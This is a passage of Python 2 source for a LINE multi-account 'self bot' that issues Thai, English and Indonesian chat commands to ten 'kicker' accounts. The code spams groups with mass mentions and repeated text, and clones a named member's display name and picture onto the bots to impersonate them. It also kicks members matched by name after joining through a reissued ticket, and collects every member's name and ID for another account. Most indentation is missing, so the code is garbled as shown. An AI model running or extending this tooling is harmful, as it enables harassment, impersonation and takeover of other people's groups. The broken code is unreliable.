d=[]
for i in group.members[j*200 : (j+1)*200]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
ki1.sendMessage(msg)
elif msg.text in ["Bot?","เทส"]:
ki1.sendText(msg.to,"😈คิกเกอร๋.1 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki2.sendText(msg.to,"😈คิกเกอร์.2 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki3.sendText(msg.to,"😈คิกเกอร์.3 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki4.sendText(msg.to,"😈คิกเกอร์.4 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki5.sendText(msg.to,"😈คิกเกอร์.5 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki6.sendText(msg.to,"😈คิกเกอร์.6 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki7.sendText(msg.to,"😈คิกเกอร์.7 รายงานต้ว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki8.sendText(msg.to,"😈คิกเกอร์.8 รายงานตีว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki9.sendText(msg.to,"😈คิกเกอร์.9 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki10.sendText(msg.to,"😈คิกเกอร์.10 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
elif "/พูด " in msg.text:
bctxt = msg.text.replace("/พูด ","")
ki1.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
ki6.sendText(msg.to,(bctxt))
ki7.sendText(msg.to,(bctxt))
ki8.sendText(msg.to,(bctxt))
ki9.sendText(msg.to,(bctxt))
ki10.sendText(msg.to,(bctxt))
elif "All mid" == msg.text:
ki1.sendText(msg.to,Amid1)
ki2.sendText(msg.to,Amid2)
ki3.sendText(msg.to,Amid3)
ki4.sendText(msg.to,Amid4)
ki5.sendText(msg.to,Amid5)
ki6.sendText(msg.to,Amid6)
ki7.sendText(msg.to,Amid7)
ki8.sendText(msg.to,Amid8)
ki9.sendText(msg.to,Amid9)
ki10.sendText(msg.to,Amid10)
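# Feature toggles below all follow the same pattern: a boolean in wait[...] plus a
# confirmation message chosen by wait["lang"] (the "JP" branch vs. the fallback).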
elif msg.text in ["Protect:on","Protect on","เปิดป้องกัน"]:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Qr:off","Qr off"]:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Qr:on","Qr on"]:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Protect:off","Protect off","ปิดป้องกัน"]:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "เปิด ล็อคชื่อ" in msg.text:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ล็อคชื่อ สำเร็จ.👌..")
else:
cl.sendText(msg.to,"bone..")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "ปิด ล็อคชื่อ" in msg.text:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ปิด ล็อคชื่อแล้ว.👌.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"bone..")
elif "ปิด เชิญ" == msg.text:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ปิดการเชิญเข้ากลุ่ม\nของสมาชิกแล้ว.👌.")
elif "เปิด เชิญ" == msg.text:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"เปิด ให้สมาชิกทุกคน\nสามรถเชิญเพื่อนได้.👌.")
except:
pass
elif "Cn: " in msg.text:
string = msg.text.replace("Cn: ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Name " + string + " Done Bosqu")
elif msg.text in ["invite:on"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
elif "Mc " in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Mc: " in msg.text:
mmid = msg.text.replace("Mc: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
ki1.sendMessage(msg)
ki2.sendMessage(msg)
ki3.sendMessage(msg)
ki4.sendMessage(msg)
ki5.sendMessage(msg)
ki6.sendMessage(msg)
ki7.sendMessage(msg)
ki8.sendMessage(msg)
ki9.sendMessage(msg)
ki10.sendMessage(msg)
elif msg.text in ["K on","เปิด คท","Contact on","K:on"]:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
elif msg.text in ["contact v"]:
if msg.from_ in admin:
wait["winvite"] = True
random.choice(KAC).sendText(msg.to,"send contact")
elif msg.text in ["K:off","ปิด คท","Contact off","K off"]:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu ")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
elif msg.text in ["Auto join on","Join on","Join:on","เปิด เข้ากลุ่ม","Poin on"]:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
elif msg.text in ["Join off","Auto join off","ปิด เข้ากลุ่ม","Join:off","Poin off"]:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
elif "Gcancel:" in msg.text:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
    num = int(strnum)
    wait["autoCancel"]["on"] = True
    wait["autoCancel"]["members"] = num  # threshold read back by the settings display
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + " The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Leave:on","Auto leave on","เปิด ออกแชท","Leave on"]:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了开。")
elif msg.text in ["Leave:off","Auto leave off","ปิด ออกแชท","Leave off"]:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["เปิด แชร์","Share on","Share:on"]:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了开。")
elif msg.text in ["ปิด แชร์","Share off","Share:off"]:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了关断。")
elif msg.text in ["Like on","เปิด ไลค์"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดอยู่แล้ว。")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดระบบออโต้ไลค์.👌")
elif msg.text in ["ปิด ไลค์","Like off"]:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดอยู่แล้ว")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดระบบออโต้ไลค์.👌")
#========================================
#========================================
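# Status summary: renders each wait[...] flag as a check/cross line and sends the
# whole block as one message.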
elif msg.text in ["เชคค่า","เช็คค่า","Set"]:
print "Setting pick up..."
md = "SELF BOT\nBy:☬ARIFISTIFIK☬\n\n"
if wait["likeOn"] == True: md+=" ออโต้ไลค์ : ✔ \n"
else:md+=" ออโต้ไลค์ : ❌ \n"
if wait["alwayRead"] == True: md+=" อ่าน : ✔ ??\n"
else:md+=" อ่าน : ❌ \n"
if wait["detectMention"] == True: md+=" ตอบแทค : ✔ \n"
else:md+=" ตอบแทค : ❌ \n"
if wait["kickMention"] == True: md+=" ออโต้เตะ: ✔ \n"
else:md+=" ออโต้เตะ : ❌ \n"
if wait["Notifed"] == True: md+=" Notifed : ✔ \n"
else:md+=" Notifed : ❌ \n"
if wait["Notifedbot"] == True: md+=" Notifedbot : ✔ \n"
else:md+=" Notifedbot : ❌ \n"
if wait["acommentOn"] == True: md+=" Hhx1 : ✔ \n"
else:md+=" Hhx1 : ❌ \n"
if wait["bcommentOn"] == True: md+=" Hhx2 : ✔ \n"
else:md+=" Hhx2 : ❌ \n"
if wait["ccommentOn"] == True: md+=" Hhx3 : ✔ \n"
else:md+=" Hhx3 : ❌ \n"
if wait["Protectcancl"] == True: md+=" Cancel : ✔ \n"
else:md+=" Cancel : ❌ \n"
if wait["winvite"] == True: md+=" เชิญ: ✔ \n"
else:md+=" เชิญ : ❌ \n"
if wait["pname"] == True: md+=" ล็อคชื่อ : ✔ \n"
else:md+=" ล็อคชื่อ : ❌ \n"
if wait["contact"] == True: md+=" Contact : ✔ \n"
else: md+=" Contact : ❌ \n"
if wait["autoJoin"] == True: md+=" ออโต้เข้ากลุ่ม : ✔ \n"
else: md +=" ออโต้เข้ากลุ่ม : ❌ \n"
if wait["autoCancel"]["on"] == True:md+=" Group cancel :" + str(wait["autoCancel"]["members"]) + " \n"
else: md+= " Group cancel : ❌ \n"
if wait["leaveRoom"] == True: md+=" ออโต้ ออกแชท : ✔ \n"
else: md+=" ออโต้ ออกแชท: ❌ \n"
if wait["timeline"] == True: md+=" ออโต้ แชร์ : ✔ \n"
else:md+=" ออโต้ แชร์ : ❌ \n"
if wait["clock"] == True: md+=" ชื่อ นาฬิกา : ✔ \n"
else:md+=" ชื่อ นาฬิกา : ❌ \n"
if wait["autoAdd"] == True: md+=" ออโต้ เพิ่มเพื่อน : ✔ \n"
else:md+=" ออโต้ เพิ่มเพื่อน : ❌ \n"
if wait["commentOn"] == True: md+=" ออโต้ คอมเม้น : ✔ \n"
else:md+=" ออโต้ คอมเม้น : ❌ \n"
if wait["Backup"] == True: md+=" ดึงกลับ : ✔ \n"
else:md+=" ดึงกลับ : ❌ \n"
if wait["qr"] == True: md+=" ป้องกัน QR : ✔ \n"
else:md+=" ป้องกัน QR : ❌ \n"
cl.sendText(msg.to,md)
msg.contentType = 13
msg.contentMetadata = {'mid': admsa}
cl.sendMessage(msg)
#========================================
elif msg.text in ["รีบอท","รีบูต"]:
if msg.from_ in Creator:
cl.sendText(msg.to, "เชลบอท ได้รีสตาร์ตแล้ว.👌\nกรุณาตั้งค่าใหม่อีกครั้ง.👈")
restart_program()
print "@Restart"
else:
cl.sendText(msg.to, "No Access")
#========================================
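# รีคิก: the active kicker accounts leave and rejoin the group several times in a
# row, presumably to flush their membership state, ending with them inside the group.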
elif msg.text.lower() == 'รีคิก':
if msg.toType == 2:
G = cl.getGroup(msg.to)
cl.sendText(msg.to,"waiting...")
bots = [ki1, ki2, ki10]  # ki3-ki9 are disabled for this routine
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
# Churn: rejoin and leave repeatedly, staying in the group on the final join.
for cycle in xrange(6):
    for bot in bots:
        bot.acceptGroupInvitationByTicket(msg.to, Ticket)
    if cycle < 5:
        for bot in bots:
            bot.leaveGroup(msg.to)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki1.updateGroup(G)
print "kicker ok"
#================================================#
elif msg.text in ["Gcreator:inv","เชิญเเอทมิน"]:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
#============================
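# แปลงร่าง ("transform"): CloneContactProfile makes a kicker copy the display name
# and picture of the named member, impersonating them in the group.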
elif "คิก1 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก1 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki1.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki1.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki1.CloneContactProfile(target)
ki1.sendText(msg.to, "คิกเกอร์ 1.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "คิก2 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก2 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki2.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki2.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki2.CloneContactProfile(target)
ki2.sendText(msg.to, "คิกเกอร์ 2.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "คิก3 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก3 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki3.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki3.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki3.CloneContactProfile(target)
ki3.sendText(msg.to, "คิกเกอร์ 3.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "คิก4 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก4 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki4.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki4.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki4.CloneContactProfile(target)
ki4.sendText(msg.to, "คิกเกอร์ 4.👌\nแปลงร่าง อวตาง\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "คิก5 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก5 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki5.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki5.CloneContactProfile(target)
ki5.sendText(msg.to, "คิกเกอร์ 5.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "คิก6 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก6 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki6.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki6.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki6.CloneContactProfile(target)
ki6.sendText(msg.to, "คิกเกอร์ 6.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "คิก7 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก7 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki7.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki7.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki7.CloneContactProfile(target)
ki7.sendText(msg.to, "คิกเกอร์ 7.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "คิก8 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก8 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki8.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki8.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki8.CloneContactProfile(target)
ki8.sendText(msg.to, "คิกเกอร์ 8.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "คิก9 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก9 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki9.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki9.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki9.CloneContactProfile(target)
ki9.sendText(msg.to, "คิกเกอร์ 9.👌\nแปลงร้าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "คิก10 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก10 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki10.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki10.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki10.CloneContactProfile(target)
ki10.sendText(msg.to, "คิกเกอร์ 10.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
#=======================================================#
elif "คิกทั้งหมด @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิกทั้งหมด @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki1.CloneContactProfile(target)
ki1.sendText(msg.to, "คิกเกอร์ 1.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki2.CloneContactProfile(target)
ki2.sendText(msg.to, "คิกเกอร์ 2.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki3.CloneContactProfile(target)
ki3.sendText(msg.to, "คิกเกอร์ 3.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki4.CloneContactProfile(target)
ki4.sendText(msg.to, "คิกเกอร์ 4.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki5.CloneContactProfile(target)
ki5.sendText(msg.to, "คิกเกอร์ 5.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki6.CloneContactProfile(target)
ki6.sendText(msg.to, "คิกเกอร์ 6.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki7.CloneContactProfile(target)
ki7.sendText(msg.to, "คิกเกอร์ 7.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki8.CloneContactProfile(target)
ki8.sendText(msg.to, "คิกเกอร์ 8.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki9.CloneContactProfile(target)
ki9.sendText(msg.to, "คิกเกอร์ 9.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki10.CloneContactProfile(target)
ki10.sendText(msg.to, "คิกเกอร์ 10.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
#====================================
#================================
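# Nk: targeted kick — ki1 joins via a freshly reissued ticket, kicks every member
# whose display name matches, then leaves again. Admins are skipped.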
elif "Nk: " in msg.text:
if msg.from_ in Creator:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki1.getGroup(msg.to)
G.preventJoinByTicket = True
ki1.updateGroup(G)
nk0 = msg.text.replace("Nk: ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
targets = []
for s in X.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
if target not in admin:
ki1.kickoutFromGroup(msg.to,[target])
ki1.leaveGroup(msg.to)
# cl sends the confirmations; ki2/ki3 never joined this group and ki1 has already left
cl.sendText(msg.to,"Success BosQ")
cl.sendText(msg.to,"Pakyu~")
else:
cl.sendText(msg.to,"Admin Detected")
else:
cl.sendText(msg.to,"Lu sape!")
#=================================
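# Backup toggle: wait["Backup"] presumably makes the bot re-invite members who
# get kicked by someone else. Note the JP/ID replies are swapped relative to
# the usual pattern here, but the flag handling itself is correct.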
elif msg.text in ["Backup:on","Backup on","เปิด ดึงกลับ","เปิดการเชิญกลับ"]:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bos\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Backup On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Backup On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Sudah on Bos\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off","Backup off","ปิด ดีงกลับ","ปิดการเชิญกลับ"]:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bos\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Backup Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Backup Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Sudah off Bos\n\n"+ datetime.today().strftime('%H:%M:%S'))
#===========================================#
elif msg.text in ["Reject","ลบรัน"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปฎิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["ลบ"]:
gid = ki1.getGroupIdsInvited()
for i in gid:
ki1.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki1.sendText(msg.to,"ปฎิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
#=============================================#
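# "Login": QR-login flow for the ki1 kicker. Assumes logincall/lgncall and the
# LINEVITLogged flag are defined at module level; user1 holds ki1's mid so the
# main account can DM it later (see the "." handler below).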
elif msg.text in ["Login","ขอลิ้ง"]:
if not LINEVITLogged:
lgncall = msg.to
ki1.login(qr=True,callback=logincall)
ki1.loginResult()
user1 = ki1.getProfile().mid
LINEVITLogged = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"%H")
nowM = datetime.strftime(now2,"%M")
nowS = datetime.strftime(now2,"%S")
tm = "\n\n"+nowT+":"+nowM+":"+nowS
cl.sendText(user1,"ล็อกอินสำเร็จ พร้อมใช้งานแล้ว (`・ω・´)"+tm)
else:
cl.sendText(msg.to,"ได้ทำการล็อคอินไปแล้ว")
elif msg.text.lower() == ".":
gs = []
try:
gs = cl.getGroup(msg.to).members
except:
try:
gs = cl.getRoom(msg.to).contacts
except:
pass
tlist = ""
for i in gs:
tlist = tlist+i.displayName+" "+i.mid+"\n\n"
if LINEVITLogged == True:
try:
ki1.sendText(user1,tlist)
except:
ki1.new_post(tlist)
else:
cl.sendText(msg.to,"ยังไม่ได้ล็อคอิน")
#========================================#
elif msg.text in ["Reject1","คิก1 ลบรัน"]:
gid = ki1.getGroupIdsInvited()
for i in gid:
ki1.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki1.sendText(msg.to,"คิกเกอร์ 1\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject2","คิก2 ลบรัน"]:
gid = ki2.getGroupIdsInvited()
for i in gid:
ki2.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki2.sendText(msg.to,"คิกเกอร์ 2\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject3","คิก3 ลบรัน"]:
gid = ki3.getGroupIdsInvited()
for i in gid:
ki3.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki3.sendText(msg.to,"คิกเกอร์ 3\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject4","คิก4 ลบรัน"]:
gid = ki4.getGroupIdsInvited()
for i in gid:
ki4.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki4.sendText(msg.to,"คิกเกอร์ 4\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject5","คิก5 ลบรัน"]:
gid = ki5.getGroupIdsInvited()
for i in gid:
ki5.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki5.sendText(msg.to,"คิกเกอร์ 5\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject6","คิก6 ลบรัน"]:
gid = ki6.getGroupIdsInvited()
for i in gid:
ki6.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki6.sendText(msg.to,"คิกเกอร์ 6\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject7","คิก7 ลบรัน"]:
gid = ki7.getGroupIdsInvited()
for i in gid:
ki7.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki7.sendText(msg.to,"คิกเกอร์ 7\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject8","คิก8 ลบรัน"]:
gid = ki8.getGroupIdsInvited()
for i in gid:
